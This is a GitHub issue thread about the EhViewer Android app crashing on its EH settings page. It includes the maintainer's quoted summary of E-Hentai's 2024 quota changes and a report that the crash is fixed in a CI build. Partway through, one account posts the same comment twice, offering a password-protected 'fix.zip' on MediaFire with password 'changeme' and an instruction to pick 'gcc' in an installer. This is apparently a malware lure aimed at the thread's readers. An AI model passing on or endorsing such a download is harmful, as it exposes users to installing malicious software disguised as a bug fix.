### ISSUE TITLE
打开设置->EH时闪退

### ISSUE THREAD

**Issue by vexling201515** [FooIbar/EhViewer#1563]
### 复现步骤 / Step to reproduce

https://github.com/user-attachments/assets/4bce009f-6d16-4530-933f-9c99b85ffde5

### 预期行为 / Expected behaviour

应该不闪退，以便用GP重置配额

### 实际行为 / Actual Behaviour

打开EH后配额数值未刷新就闪退

### 应用日志 / App logs

[log-2024-08-26-19-45-15-678.zip](https://github.com/user-attachments/files/16748164/log-2024-08-26-19-45-15-678.zip)

### 备注 / Addition details

无

### 浏览站点 / Browsing site

E-Hentai 

### EhViewer 版本号 / EhViewer version code

1.12.0

### EhViewer CI 版本 / EhViewer CI Version

6191ad7

### Android 系统版本 / Android version

Android14

### 设备型号 / Device model

iQOO Neo8 Pro

### SoC 型号 / Soc model

3.35GHz 天玑 8200+ 八核

### 自查步骤 / Verify steps

- [X] 您已搜索过 [Issue Tracker](https://github.com/FooIbar/EhViewer/issues)，没有找到类似内容 / I have searched on [Issue Tracker](https://github.com/FooIbar/EhViewer/issues), No duplicate or related open issue has been found
- [X] 您确保这个 Issue 只提及一个问题。如果您有多个问题报告，烦请发起多个 Issue / Ensure there is only one bug report in this issue. Please make mutiply issue for mutiply bugs
- [X] 您确保已使用最新 [CI 版本](https://github.com/FooIbar/EhViewer/actions)测试，并且该问题在最新 CI 版本中并未解决 / This bug have not solved in latest [CI version](https://github.com/FooIbar/EhViewer/actions)

**Comment by FooIbar** [comment]
E 站配额系统大改

> 2024-08-26
> 
> - The cutoff for when quotas can be used on archives is now one year after the gallery was posted (increased from 30 days), matching the cutoff for the H@H downloader.
> 
> - Extra re-creation costs are no longer applied to archives for galleries posted in the last year (increased from 30 days) or archives downloaded in the last 90 days (increased from 30 days).
> 
> - The way the image downloading limits work have been reworked, mainly to address various issues caused by an increase in IP address sharing due to increased use of CG-NAT and VPNs.
> 
> The old system had two modes, an account-based quota for donators and an IP-based quota for everyone else. This had a few notable quirks, like how if non-donators spent GP to reset the quota, it could be consumed by someone else sharing the same IP address.
> 
> The new system has three modes:
> 
> * Donators and people with the More Pages hathperk have an account-based quota, like what donators had before.
> 
> * Everyone else defaults to an IP-based quota, similar to before. However;
> 
> * People who do not have an account-based quota and spend the GP to "reset" it are now assigned a dedicated quota for 24 hours, set with a cookie-based token. Meaning that if you spend GP, the resulting quota can no longer be used by anyone else.
> 
> Furthermore, the behavior when you hit the limit has changed:
> 
> If you hit the limit while browsing normally, it will no longer error out with a 509 "bandwidth exceeded" screen as long as H@H is enabled. Instead, it will force using the 1280x resampled version even if the image size settings are set higher than this.
> 
> If you hit the limit while downloading source images, it will start automatically charging GP for this in the background like before, erroring out if you don't have any. If H@H is disabled, it will also still error out with the 509 "bandwidth exceeded" screen when browsing.
> 
> In other words, unless you have the image size setting at "prefer original images" or above 1280x, or H@H is disabled, hitting the limit while browsing will have no effect. Though you could still trigger the DDoS protection if you overdo it.
> 
> For IP-based quotas, it will no longer show what the limit is. This is intentional. It will however explicitly tell you on the home screen if your IP is currently restricted from using high-resolution images.

https://forums.e-hentai.org/index.php?showtopic=244935

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by CosionMa** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mojiedepulini** [comment]
+1，我点eh也发生闪退

**Comment by FooIbar** [comment]
闪退问题已于最新 CI 版本修复

**Comment by luoshuijs** [comment]
> 闪退问题已于最新 CI 版本修复

我这边使用最新的 CI 版本打开图片配额出现了解析错误的问题

应用日志 / App logs

[log_2024_08_27_18_38_44.log](https://github.com/user-attachments/files/16760850/log_2024_08_27_18_38_44.log)

**Comment by FooIbar** [comment]
解析失败是预期的，因为 E 站不显示基于 IP 的配额了
之后会修改相关文本

**Comment by SakamotoCHN** [comment]
+1同样的问题。最新的CI版本在哪里呢

**Comment by yingheshiyu** [comment]
我也是这样
